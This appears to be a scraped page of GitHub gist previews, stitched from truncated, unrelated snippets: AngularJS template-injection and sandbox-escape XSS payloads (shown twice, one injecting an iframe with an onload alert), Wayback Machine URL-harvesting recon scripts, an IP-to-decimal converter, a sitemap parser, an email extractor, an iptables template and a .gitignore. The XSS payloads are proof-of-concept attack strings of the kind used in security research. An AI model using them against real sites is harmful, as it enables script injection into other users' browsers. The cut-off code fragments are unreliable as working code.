// http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html?m=1
{{7*7}}
'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
| import sys | |
| def to_octets(ip): | |
| return [int(i) for i in ip.split('.')] | |
| def dotless_decimal(ip): | |
| octets = to_octets(ip) | |
| result = octets[0] * 16777216 + octets[1] * \ |
| import requests | |
| import sys | |
| import json | |
| def waybackurls(host, with_subs): | |
| if with_subs: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host | |
| else: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host |
| #!/bin/sh | |
| REPO_PATH=concrete5-develop | |
| DB_HOST=localhost | |
| DB_USER=root | |
| DB_PASS= | |
| DB_DBAS=concrete5 | |
| ADMIN_EMAIL=no-reply@localhost |
| import requests | |
| import re | |
| import sys | |
| from multiprocessing.dummy import Pool | |
| def robots(host): | |
| r = requests.get( | |
| 'https://web.archive.org/cdx/search/cdx\ | |
| ?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host) |
| from __future__ import with_statement # we'll use this later, has to be here | |
| from argparse import ArgumentParser | |
| import requests | |
| from BeautifulSoup import BeautifulStoneSoup as Soup | |
| def parse_sitemap(url): | |
| resp = requests.get(url) | |
| # we didn't get a valid response, bail |
// http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html?m=1
{{7*7}}
'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
| #!/usr/bin/env python | |
| # | |
| # Extracts email addresses from one or more plain text files. | |
| # | |
| # Notes: | |
| # - Does not save to file (pipe the output to a file if you want it saved). | |
| # - Does not check for duplicates (which can easily be done in the terminal). | |
| # | |
| # (c) 2013 Dennis Ideler <ideler.dennis@gmail.com> |
#Angular Sandbox Escapes Cheatsheet
Source: XSS without HTML: Client-Side Template Injection with AngularJS
1.0.1 - 1.1.5 Mario Heiderich (Cure53)
{{constructor.constructor('alert(1)')()}}
1.2.0 - 1.2.1
| # Modify this file accordingly for your specific requirement. | |
| # http://www.thegeekstuff.com | |
| # 1. Delete all existing rules | |
| iptables -F | |
| # 2. Set default chain policies | |
| iptables -P INPUT DROP | |
| iptables -P FORWARD DROP | |
| iptables -P OUTPUT DROP |
| # Logs | |
| logs | |
| *.log | |
| npm-debug.log* | |
| # Runtime data | |
| pids | |
| *.pid | |
| *.seed |